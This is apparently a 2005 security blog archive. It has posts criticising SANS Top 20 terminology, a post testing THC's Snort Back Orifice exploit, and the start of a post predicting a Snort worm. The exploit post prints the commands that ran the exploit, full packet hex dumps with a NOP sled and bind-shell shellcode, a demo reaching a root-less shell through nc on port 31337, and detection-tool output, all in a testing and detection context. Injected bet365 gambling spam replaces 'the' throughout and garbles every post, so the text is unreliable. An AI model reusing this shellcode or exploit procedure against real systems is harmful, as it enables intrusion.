Showing posts with label vulnerabilities. Show all posts
Showing posts with label vulnerabilities. Show all posts

Monday, November 28, 2005

SANS Replaces Several Threat References in Top 20

Last week I posted comments about several misuses of cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 word "threat" in cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 latest SANS twenty most critical Internet security vulnerabilities. After receiving an email from Alan Paller, I returned to cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 SANS site and saw many of my recommended changes were made. For example, you can now "Jump To Index of Top 20 Vulnerabilities", instead of "threats." I appreciate SANS taking my suggestions to heart.

Update: It's becoming clear where cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 confusion regarding "threat" vs "vulnerability" originates for cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 SANS Top 20. One of you pointed me towards cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 article Mac OS X Under Scrutiny. See how many misuses of cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 term threat you can find. Here's a freebie:

"SANS's Dhamankar stressed that cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 intent was not to call cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 Mac OS X operating system a threat, but to give Mac users a wake up call."

Tuesday, November 22, 2005

The Good and cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 Bad About cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 New SANS Top 20

Back in January I noted that SANS was not using cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 terms "threat" and "vulnerability" properly in its call for help on cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 "twenty most critical Internet security vulnerabilities," represented by cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 logo at left.

You will remember that a threat is a party with cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 capabilities and intentions to exploit a vulnerability in an asset. A vulnerability is a weakness in an asset that could lead to exploitation. An intruder (cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 threat) exploits a hole (cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 vulnerability) in Microsoft IIS to gain remote control of a Web server. In ocá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365r words, threats exploit vulnerabilities.

Today, version 6 of cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 Top 20 was released. I'll start with "cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 good." I believe cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 majority of cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 2005 content is much better than cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 2004 edition. The 2004 list, and previous lists, displayed 10 Windows vulnerabilities and 10 (often dubious) Unix vulnerabilities. The 2005 list, in contrast, displays cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 following vulnerabilities:

Top Vulnerabilities in Windows Systems

* W1. Windows Services
* W2. Internet Explorer
* W3. Windows Libraries
* W4. Microsoft Office and Outlook Express
* W5. Windows Configuration Weaknesses

Top Vulnerabilities in Cross-Platform Applications

* C1. Backup Software
* C2. Anti-virus Software
* C3. PHP-based Applications
* C4. Database Software
* C5. File Sharing Applications
* C6. DNS Software
* C7. Media Players
* C8. Instant Messaging Applications
* C9. Mozilla and Firefox Browsers
* C10. Ocá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365r Cross-platform Applications

Top Vulnerabilities in UNIX Systems

* U1. UNIX Configuration Weaknesses
* U2. Mac OS X

Top Vulnerabilities in Networking Products

* N1. Cisco IOS and non-IOS Products
* N2. Juniper, CheckPoint and Symantec Products
* N3. Cisco Devices Configuration Weaknesses

Bravo. I think that is a significant step towards realizing cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 scope of cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 problem at hand. To be fair to Microsoft, I believe cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365re could have been "Unix services" and "Unix libraries" sections. I applaud cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 addition of network products and ocá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365r applications. Content-wise, this is a great resource.

Now, "cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 bad." The top of cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 page has this link: -----Jump To Index of Top 20 Threats -----. For Pete's sake, cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 title of cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 document is "The Twenty Most Critical Internet Security Vulnerabilities." These are not threats.

Let's see ocá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365r terms in use:

In cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 introduction we see:

"In addition to Windows and UNIX categories, we have also included Cross-Platform Applications and Networking Products. The change reflects cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 dynamic nature of cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 evolving threat landscape."

I can accept this use of cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 term threat, if cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 intent is to refer to parties who exploit vulnerabilities.

Next:

"We will update cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 list and cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 instructions as more critical threats and more current or convenient methods of protection are identified, and we welcome your input along cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 way."

Here, threats should be "vulnerabilities".

Section C2:

"Compromising a gateway could potentially cause a much larger impact since cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 gateway is cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 outer layer of protection and cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 only protection for some threats in many small organizations."

This should eicá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365r replace "threats" with "vulnerabilities", or "for some" with "from some".

Section C5:

"The main threats arising from P2P software are:"

I think threats should be "risks" here, although cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 list is a muddle of different issues.

Later in that section:

"The number of threats using P2P, IM, IRC, and CIFS within Symantec's top 50 malicious code reports has increased by 39% over cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 previous six-month period."

Here, I can accept cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 use of cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 term as long as cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 intent is to describe parties abusing P2P, IM, etc.

Section C8:

"These applications provide an increasing security threat to an organization. The major threats are cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 following:"

Here's a simple rule of thumb: applications can never be "threats." Again, I suggest replacing cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 second "threats" here with "risks".

One final note: I am not a lone voice speaking on this subject. The Financial Times, of all people, is linked from cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 SANS page with a story Hackers pose new threat to desktop software. That's cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 proper use of cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 term threat, since a hacker is a "party."

Security will not be taken seriously as a "profession" until its "thought leaders" use basic terms properly.

Tuesday, October 25, 2005

Snort BO Exploit Published

As I expected, FrSIRT published an exploit for cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 Snort Back Orifice vulnerability discovered last week. I was able to compile and execute this code by RD of THC.org on FreeBSD 5.4.

orr:/home/richard$ ./THCsnortbo 66.93.110.10 1
Snort BackOrifice PING exploit (version 0.3)
by rd@thc.org

Selected target:
1 | manual testing gcc with -O0

Sending exploit to 66.93.110.10
Done.
orr:/home/richard$ ./THCsnortbo 66.93.110.10 2
Snort BackOrifice PING exploit (version 0.3)
by rd@thc.org

Selected target:
2 | manual testing gcc with -O2

Sending exploit to 66.93.110.10
Done.

Here is what cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 traffic looks like:

09:30:36.134739 IP 192.168.2.5.56292 > 66.93.110.10.53: 52835 updateD ServFail [5863q][|domain]
0x0000: 4500 0594 0bdb 0000 4011 f669 c0a8 0205 E.......@..i....
0x0010: 425d 6e0a dbe4 0035 0580 9592 ce63 d1d2 B]n....5.....c..
0x0020: 16e7 13cf d45a 5a79 4d8a b466 aaa2 c875 .....ZZyM..f...u
0x0030: 2309 78b2 e0d4 ef49 8a8e 39e5 aa8a 4d0d #.x....I..9...M.
0x0040: 22b5 3751 6ec9 9763 29e3 8469 f317 7430 ".7Qn..c)..i..t0
0x0050: f162 20c3 d501 a47b c0a0 c559 a5d5 96b2 .b.....{...Y....
0x0060: b04f fc0b 6749 d086 70c3 e65b 93f2 8c0a .O..gI..p..[....
0x0070: 0197 140f 95ce 3598 3a88 2fb3 cdbb ae2b ......5.:./....+
0x0080: 0458 7135 0f1e 8b06 be6d 2aa8 84bd 56ec .Xq5.....m*...V.
0x0090: da50 3ca1 a785 0b46 be2e bf3c a9a5 dd80 .P<....F...<....
0x00a0: 855a de98 ed70 cf8c 3cc9 b7f7 8ddf 3b7d .Z...p..<.....;}
0x00b0: 0595 ffbf f38d 4e6d 769b 7c1c c159 6a58 ......Nmv.|..YjX
0x00c0: 3b5c 6a7b 8aa8 43df f0c0 9710 36a0 0306 ;\j{..C.....6...
0x00d0: e92e 8752 824e a6b6 4a75 d07a bdc1 9e1c ...R.N..Ju.z....
0x00e0: ce27 bee7 6c6c d148 c458 303d a7a8 d68e .'..ll.H.X0=....
0x00f0: 6e43 7a81 5a50 fb69 81a6 e17e c6a3 c293 nCz.ZP.i...~....
0x0100: a7e1 a244 3d06 ffce 003a ac84 c95f 1bbf ...D=....:..._..
0x0110: bcbc a1d5 86bb d48d 0374 5852 c349 1b46 .........tXR.I.F
0x0120: ad73 deb9 25fc b51a 8a4f b14d 03cd bbfe .s..%....O.M....
0x0130: 9c22 a315 eb17 1bab f848 1d1b 3c39 143c .".......H..<9.<
0x0140: e965 5a0e 0a78 bd94 6cde 07a1 feda 7f15 .eZ..x..l.......
0x0150: 35db aa6a 13ac 966a 096b 98e4 7a9d 94be 5..j...j.k..z...
0x0160: 6100 7dcd 76e0 dee3 ae4e 78a8 e16e 0c8c a.}.v....Nx..n..
0x0170: 6f70 1c5b 2522 ee93 bca4 1132 04fc 4294 op.[%".....2..B.
0x0180: 3f0a 901b b0fe dfef 76e9 ca89 b472 6d4a ?.......v....rmJ
0x0190: b3ca e2b1 09c1 2a6d bcfa afd0 a2bd 2745 ......*m......'E
0x01a0: 2b6d dbc3 41d9 6941 6e96 a76d 9fcc 49f8 +m..A.iAn..m..I.
0x01b0: 880f a4b4 2812 1401 0e17 1be4 dc2a ebd9 ....(........*..
0x01c0: 8b0f 864b 10f9 8481 1dfc 559b 2b45 67fd ...K......U.+Eg.
0x01d0: 7609 8a6b 093b 32f7 1ce2 3df6 fbea 7699 v..k.;2...=...v.
0x01e0: 49fa 39db 25a6 f877 0c05 ddfc 3f26 b002 I.9.%..w....?&..
0x01f0: 06be fc5f 55a6 4db6 6d83 7dd0 8645 2f2d ..._U.M.m.}..E/-
0x0200: 6dd4 db5c 6988 2c69 a2f8 86d7 e3f5 8cef m..\i.,i........
0x0210: bfd8 e157 5219 6de6 6ac2 02b7 46a3 409d ...WR.m.j...F.@.
0x0220: 1d87 d616 42e7 4962 c75d fa55 00dc 234b ....B.Ib.].U..#K
0x0230: 295e e29c 8a9e 5a91 1a87 76d5 a26c 4f0f )^....Z...v..lO.
0x0240: 035a 7030 5b2b 18e8 833c 1f9e 1d41 3ddf .Zp0[+...<...A=.
0x0250: ad38 2755 c4bb 9cfc 25da bf52 2208 258e .8'U....%..R".%.
0x0260: 86d5 f2d2 f9dc 1fa3 ff7d 5ed9 62ce 4112 .........}^.b.A.
0x0270: 512e 188b 69da 1af2 1343 2656 4ee0 8aa0 Q...i....C&VN...
0x0280: 8fe0 8406 a602 265d e2e9 ff0e d8ca 788d ......&]......x.
0x0290: c068 bda6 0042 9d19 6d0a 53e8 af7a 46ed .h...B..m.S..zF.
0x02a0: 25a3 ad51 2966 577b b5a6 2aa6 85bd 2a57 %..Q)fW{..*...*W
0x02b0: 7fae 7dad 31bb cd19 ba18 0e90 ccff 203e ..}.1..........>
0x02c0: 70e6 b67e ea4e 18a8 1e9d 67a9 74ae 9fb9 p..~.N....g.t...
0x02d0: 38e8 82c9 252c d29b 8313 1e17 2df8 e1fb 8...%,......-...
0x02e0: 38b1 88d3 9223 53c9 2776 fd5f aa67 3f7a 8....#S.'v._.g?z
0x02f0: 121e 7221 c37f 1427 2ee4 4ca5 7bab 71cb ..r!...'..L.{.q.
0x0300: 868c c978 484e ae69 383a f58e 312f f223 ...xHN.i8:..1/.#
0x0310: 16f8 36fe 93bb 7aa4 a5d4 41a1 fdc2 58b7 ..6...z...A...X.
0x0320: a1df a196 1455 522e f8af b7c1 306e 7fbc .....UR.....0n..
0x0330: 2a7e 3527 dd49 adbb 1049 2334 5b83 7ee7 *~5'.I...I#4[.~.
0x0340: 9232 7a55 1f42 86c0 6e1f 6b1e 508d 8f6c .2zU.B..n.k.P..l
0x0350: b899 b925 2acf d5d3 358d 5a25 1e78 8b61 ...%*...5.Z%.x.a
0x0360: 1f6e 5bdc 10fc 94c8 e511 b96d 1712 2a5c .n[........m..*
0x0370: 480f e81f 41b6 5ab5 3e67 f01d ada8 86d0 H...A.Z.>g......
0x0380: 72d9 8b54 4f6a c2ee 426c 6858 ef06 18d3 r..TOj..BlhX....
0x0390: 4009 4bfe 8a06 04e8 32de 2bc3 f0fa 389a @.K.....2.+...8.
0x03a0: 93fd b3c4 a576 59f9 8f7a 2284 a051 c09a .....vY..z"..Q..
0x03b0: 8a70 0aea 8e87 fa75 1a9c b4a0 1078 0968 .p.....u.....x.h
0x03c0: 68c0 bbb5 9807 a152 f4a2 0d9c b1fc 4c58 h......R......LX
0x03d0: 2ecb 6d4a f482 8684 fd88 73dc b489 2121 ..mJ......s...!!
0x03e0: 5b4c eacf 73e5 c2a0 372c 9145 4a6d 62b6 [L..s...7,.EJmb.
0x03f0: 5261 dc27 e57d ce3c c3ca d05e 44f5 274e Ra.'.}.<...^D.'N
0x0400: 1467 cab9 db78 63cc 62e0 b80a 734e cb5c .g...xc.b...sN.
0x0410: a01c 5ea8 4782 9bc6 d52a 134e 88a4 e5b6 ..^.G....*.N....
0x0420: b91b 813b 5ac8 4e7d dca6 c911 55e5 4ff1 ...;Z.N}....U.O.
0x0430: 9f83 5c16 8477 7529 d9b0 6336 e9aa 8210 ..\..wu)..c6....
0x0440: d5ef 789e 77bd 491c 2e92 e890 16bc d51e ..x.w.I.........
0x0450: f8fd 1e58 2446 23ee fa37 8841 3e90 9090 ...X$F#..7.A>...
0x0460: 9090 9090 9090 9090 9090 9090 9090 9090 ................
0x0470: 9090 9090 9090 9090 9090 9090 9090 9090 ................
0x0480: 9090 9090 9090 9090 9090 9090 9090 9090 ................
0x0490: 9090 9090 9090 9090 9090 9090 9090 9090 ................
0x04a0: 9090 9090 9090 9090 9090 9090 9090 9090 ................
0x04b0: 9090 9090 9090 9090 9090 9090 9090 9090 ................
0x04c0: 9090 9090 9090 9090 9090 9090 9090 9090 ................
0x04d0: 9090 9090 9090 9090 9090 9090 9090 9090 ................
0x04e0: 9090 9090 9090 9090 9090 9090 9090 9090 ................
0x04f0: 9090 9090 9090 9090 9090 9090 9090 9090 ................
0x0500: 9090 9090 9090 9090 9090 9090 9090 9090 ................
0x0510: 9090 9090 9090 9090 9090 9090 9090 9090 ................
0x0520: 9090 9090 9090 9090 9090 9090 9090 9090 ................
0x0530: 9090 9090 9090 9090 9090 9090 9090 31db ..............1.
0x0540: 5343 536a 026a 6658 9989 e1cd 8096 4352 SCSj.jfX......CR
0x0550: 6668 7a69 6653 89e1 6a66 5850 5156 89e1 fhzifS..jfXPQV..
0x0560: cd80 b066 d1e3 cd80 5252 5643 89e1 b066 ...f....RRVC...f
0x0570: cd80 936a 0259 b03f cd80 4979 f9b0 0b52 ...j.Y.?..Iy...R
0x0580: 682f 2f73 6868 2f62 696e 89e3 5253 89e1 h//shh/bin..RS..
0x0590: cd80 0000 ....
09:30:49.654205 IP 192.168.2.5.55465 > 66.93.110.10.53: 52835 updateD ServFail [5863q][|domain]
0x0000: 4500 0594 0be4 0000 4011 f660 c0a8 0205 E.......@..`....
0x0010: 425d 6e0a d8a9 0035 0580 8ec2 ce63 d1d2 B]n....5.....c..
0x0020: 16e7 13cf 1fa1 a586 4d8a b466 aaa2 c875 ........M..f...u
0x0030: 2309 78b2 e0d4 ef49 8a8e 39e5 aa8a 4d0d #.x....I..9...M.
0x0040: 22b5 3751 6ec9 9763 29e3 8469 f317 7430 ".7Qn..c)..i..t0
0x0050: f162 20c3 d501 a47b c0a0 c559 a5d5 96b2 .b.....{...Y....
0x0060: b04f fc0b 6749 d086 70c3 e65b 93f2 8c0a .O..gI..p..[....
0x0070: 0197 140f 95ce 3598 3a88 2fb3 cdbb ae2b ......5.:./....+
0x0080: 0458 7135 0f1e 8b06 be6d 2aa8 84bd 56ec .Xq5.....m*...V.
0x0090: da50 3ca1 a785 0b46 be2e bf3c a9a5 dd80 .P<....F...<....
0x00a0: 855a de98 ed70 cf8c 3cc9 b7f7 8ddf 3b7d .Z...p..<.....;}
0x00b0: 0595 ffbf f38d 4e6d 769b 7c1c c159 6a58 ......Nmv.|..YjX
0x00c0: 3b5c 6a7b 8aa8 43df f0c0 9710 36a0 0306 ;\j{..C.....6...
0x00d0: e92e 8752 824e a6b6 4a75 d07a bdc1 9e1c ...R.N..Ju.z....
0x00e0: ce27 bee7 6c6c d148 c458 303d a7a8 d68e .'..ll.H.X0=....
0x00f0: 6e43 7a81 5a50 fb69 81a6 e17e c6a3 c293 nCz.ZP.i...~....
0x0100: a7e1 a244 3d06 ffce 003a ac84 c95f 1bbf ...D=....:..._..
0x0110: bcbc a1d5 86bb d48d 0374 5852 c349 1b46 .........tXR.I.F
0x0120: ad73 deb9 25fc b51a 8a4f b14d 03cd bbfe .s..%....O.M....
0x0130: 9c22 a315 eb17 1bab f848 1d1b 3c39 143c .".......H..<9.<
0x0140: e965 5a0e 0a78 bd94 6cde 07a1 feda 7f15 .eZ..x..l.......
0x0150: 35db aa6a 13ac 966a 096b 98e4 7a9d 94be 5..j...j.k..z...
0x0160: 6100 7dcd 76e0 dee3 ae4e 78a8 e16e 0c8c a.}.v....Nx..n..
0x0170: 6f70 1c5b 2522 ee93 bca4 1132 04fc 4294 op.[%".....2..B.
0x0180: 3f0a 901b b0fe dfef 76e9 ca89 b472 6d4a ?.......v....rmJ
0x0190: b3ca e2b1 09c1 2a6d bcfa afd0 a2bd 2745 ......*m......'E
0x01a0: 2b6d dbc3 41d9 6941 6e96 a76d 9fcc 49f8 +m..A.iAn..m..I.
0x01b0: 880f a4b4 2812 1401 0e17 1be4 dc2a ebd9 ....(........*..
0x01c0: 8b0f 864b 10f9 8481 1dfc 559b 2b45 67fd ...K......U.+Eg.
0x01d0: 7609 8a6b 093b 32f7 1ce2 3df6 fbea 7699 v..k.;2...=...v.
0x01e0: 49fa 39db 25a6 f877 0c05 ddfc 3f26 b002 I.9.%..w....?&..
0x01f0: 06be fc5f 55a6 4db6 6d83 7dd0 8645 2f2d ..._U.M.m.}..E/-
0x0200: 6dd4 db5c 6988 2c69 a2f8 86d7 e3f5 8cef m..\i.,i........
0x0210: bfd8 e157 5219 6de6 6ac2 02b7 46a3 409d ...WR.m.j...F.@.
0x0220: 1d87 d616 42e7 4962 c75d fa55 00dc 234b ....B.Ib.].U..#K
0x0230: 295e e29c 8a9e 5a91 1a87 76d5 a26c 4f0f )^....Z...v..lO.
0x0240: 035a 7030 5b2b 18e8 833c 1f9e 1d41 3ddf .Zp0[+...<...A=.
0x0250: ad38 2755 c4bb 9cfc 25da bf52 2208 258e .8'U....%..R".%.
0x0260: 86d5 f2d2 f9dc 1fa3 ff7d 5ed9 62ce 4112 .........}^.b.A.
0x0270: 512e 188b 69da 1af2 1343 2656 4ee0 8aa0 Q...i....C&VN...
0x0280: 8fe0 8406 a602 265d e2e9 ff0e d8ca 788d ......&]......x.
0x0290: c068 bda6 0042 9d19 6d0a 53e8 af7a 46ed .h...B..m.S..zF.
0x02a0: 25a3 ad51 2966 577b b5a6 2aa6 85bd 2a57 %..Q)fW{..*...*W
0x02b0: 7fae 7dad 31bb cd19 ba18 0e90 ccff 203e ..}.1..........>
0x02c0: 70e6 b67e ea4e 18a8 1e9d 67a9 74ae 9fb9 p..~.N....g.t...
0x02d0: 38e8 82c9 252c d29b 8313 1e17 2df8 e1fb 8...%,......-...
0x02e0: 38b1 88d3 9223 53c9 2776 fd5f aa67 3f7a 8....#S.'v._.g?z
0x02f0: 121e 7221 c37f 1427 2ee4 4ca5 7bab 71cb ..r!...'..L.{.q.
0x0300: 868c c978 484e ae69 383a f58e 312f f223 ...xHN.i8:..1/.#
0x0310: 16f8 36fe 93bb 7aa4 a5d4 41a1 fdc2 58b7 ..6...z...A...X.
0x0320: a1df a196 1455 522e f8af b7c1 306e 7fbc .....UR.....0n..
0x0330: 2a7e 3527 dd49 adbb 1049 2334 5b83 7ee7 *~5'.I...I#4[.~.
0x0340: 9232 7a55 1f42 86c0 6e1f 6b1e 508d 8f6c .2zU.B..n.k.P..l
0x0350: b899 b925 2acf d5d3 358d 5a25 1e78 8b61 ...%*...5.Z%.x.a
0x0360: 1f6e 5bdc 10fc 94c8 e511 b96d 1712 2a5c .n[........m..*
0x0370: 480f e81f 41b6 5ab5 3e67 f01d ada8 86d0 H...A.Z.>g......
0x0380: 72d9 8b54 4f6a c2ee 426c 6858 ef06 18d3 r..TOj..BlhX....
0x0390: 4009 4bfe 8a06 04e8 32de 2bc3 f0fa 389a @.K.....2.+...8.
0x03a0: 93fd b3c4 a576 59f9 8f7a 2284 a051 c09a .....vY..z"..Q..
0x03b0: 8a70 0aea 8e87 fa75 1a9c b4a0 1078 0968 .p.....u.....x.h
0x03c0: 68c0 bbb5 9807 a152 f4a2 0d9c b1fc 4c58 h......R......LX
0x03d0: 2ecb 6d4a f482 8684 fd88 73dc b489 2121 ..mJ......s...!!
0x03e0: 5b4c eacf 73e5 c2a0 372c 9145 4a6d 62b6 [L..s...7,.EJmb.
0x03f0: 5261 dc27 e57d ce3c c3ca d05e 44f5 274e Ra.'.}.<...^D.'N
0x0400: 1467 cab9 db78 63cc 62e0 b80a 734e cb5c .g...xc.b...sN.
0x0410: a01c 5ea8 4782 9bc6 d52a 134e 88a4 e5b6 ..^.G....*.N....
0x0420: b91b 813b 5a1c edcf 5da6 c911 55e5 4ff1 ...;Z...]...U.O.
0x0430: 9f77 ffa4 0577 7529 d9b0 6336 e97e 21a2 .w...wu)..c6.~!.
0x0440: 54ef 789e 77bd 491c 2ef1 71b6 0f90 9090 T.x.w.I...q.....
0x0450: 9090 9090 9090 9090 9090 9090 9090 9090 ................
0x0460: 9090 9090 9090 9090 9090 9090 9090 9090 ................
0x0470: 9090 9090 9090 9090 9090 9090 9090 9090 ................
0x0480: 9090 9090 9090 9090 9090 9090 9090 9090 ................
0x0490: 9090 9090 9090 9090 9090 9090 9090 9090 ................
0x04a0: 9090 9090 9090 9090 9090 9090 9090 9090 ................
0x04b0: 9090 9090 9090 9090 9090 9090 9090 9090 ................
0x04c0: 9090 9090 9090 9090 9090 9090 9090 9090 ................
0x04d0: 9090 9090 9090 9090 9090 9090 9090 9090 ................
0x04e0: 9090 9090 9090 9090 9090 9090 9090 9090 ................
0x04f0: 9090 9090 9090 9090 9090 9090 9090 9090 ................
0x0500: 9090 9090 9090 9090 9090 9090 9090 9090 ................
0x0510: 9090 9090 9090 9090 9090 9090 9090 9090 ................
0x0520: 9090 9090 9090 9090 9090 9090 9090 9090 ................
0x0530: 9090 9090 9090 9090 9090 9090 9090 31db ..............1.
0x0540: 5343 536a 026a 6658 9989 e1cd 8096 4352 SCSj.jfX......CR
0x0550: 6668 7a69 6653 89e1 6a66 5850 5156 89e1 fhzifS..jfXPQV..
0x0560: cd80 b066 d1e3 cd80 5252 5643 89e1 b066 ...f....RRVC...f
0x0570: cd80 936a 0259 b03f cd80 4979 f9b0 0b52 ...j.Y.?..Iy...R
0x0580: 682f 2f73 6868 2f62 696e 89e3 5253 89e1 h//shh/bin..RS..
0x0590: cd80 0000 ....

I ran this traffic by a local sensor running Snort 2.3.3 on FreeBSD 5.4 and it continued to function. There was no DoS or exploit. RD's exploit as written targets Linux. His demo exploits a 2.6 kernel:

* $ ./snortbo 192.168.0.101 1
* Snort BackOrifice PING exploit (version 0.3)
* by rd@thc.org
*
* Selected target:
* 1 | manual testing gcc with -O0
*
* Sending exploit to 192.168.0.101
* Done.
*
* $ nc 192.168.0.101 31337
* id
* uid=104(snort) gid=409(snort) groups=409(snort)
* uname -sr
* Linux 2.6.11-hardened-r1

Kyle Haugsness wrote a tool and rules to detect cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 Snort BO exploit which you might find useful. By following cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 directions in cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 code I got it to work on FreeBSD 5.4:

orr:/home/richard$ gcc -Wall -lpcap -o ident-snort-bo-exploit ident-snort-bo-exploit.c
orr:/home/richard$ sudo ./ident-snort-bo-exploit
# Using interface: fxp0
# Using alert output file: stdout
# Using pcap output file: snort-bo-exploit-2005-10-25-09:46:54.cap
#
##############################################
#
# Detected exploit attempt! (details below)
# Note that shellcode should start after 9th
# byte into cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 payload below (cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 8 byte
# magic value has been removed and cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365
# remainder of cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 header is 9 bytes).
#
##############################################
#
# Date/time: Tue Oct 25 09:47:21 2005
# Source IP: 192.168.2.5
# Dest IP: 66.93.110.10
# Source port: 64544
# Dest port: 53
# UDP data len: 1400
# BO key (dec): 31337
# BO key (hex): 0x7A69
# BO data len: -18 (UDP len - 17 byte BO header)
# BO pkt id: -1
# BO pkt type: 0x01 (0x01 = PING)
#
# Decrypted BO data:
#
0x0000: FF FF FF FF FF FF FF FF 01 90 90 90 90 90 90 90 ................
0x0010: 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
0x0020: 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
...edited...
0x0550: 3D AA E7 D7 80 CA 0F 07 36 14 2A 0C 65 08 05 8C =.......6.*.e...
0x0560: EE 97 25 0C 0F 90 66 06 2B 5B E2 3C CE E9 14 4B ..%...f.+[.<...K
0x0570: 00 00 00 00 00 00 00 00 ........
#
# Decoded packet num: 1; Exploit: yes; Timestamp: Tue Oct 25 09:47:21 2005

On a related note, I saw Tom Ptacek comment on my earlier post. Tom says:

"There is nothing wrong with looking for vulnerabilities in your competitor's products, and Neel Mehta has built enough of a rep for himself that he doesn't need to take 'marching orders' from anybody."

I agree cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365re is nothing wrong with looking for vulnerabilities in your competitor's products. However, are we supposed to believe that Neel Mehta, an ISS X-Force researcher, developed this exploit on his own? Are we supposed to think he did not do this at cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 direction of his employer, who published an advisory? If Neel discovered this vulnerability on his own, and not while working for ISS, why did Sourcefire learn of cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 vulnerability from US-CERT and not Neel himself?

Saturday, October 22, 2005

The Coming Snort Worm

This week we learned via an advisory of a vulnerability in cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 Back Orifice preprocessor in Snort version 2.4.2, 2.4.1, and 2.4.0. The vulnerability was discovered by anocá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365r ISS X-Force researcher. I bet (but have no inside knowledge) that he was following cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 same marching orders that Mike Lynn received: find vulnerabilities in competitors' products. Mike looked at Cisco, and Neel Mehta looked at Sourcefire's Snort.

I am sure ISS is still bitter over cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 Witty worm that revealed cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 installed ISS RealSecure and BlackIce userbase to be about 12,000 systems. The Witty worm spread via a single UDP packet with a fixed source port of 4000 UDP.

Let's consider cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 factors that lead me to believe that cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 Snort BO vulnerability will produce a worm.

  1. The new vulnerability can be exploited by a specially crafted UDP packet to or from any port ocá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365r than port 31337. (Thanks to Jose Nazario for correcting me on this point.) This is similar to cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 UDP packet used by Witty. UDP is an ideal worm vector, as demonstrated by Slammer. There is no need for a TCP handshake, which means spoofing is much easier.

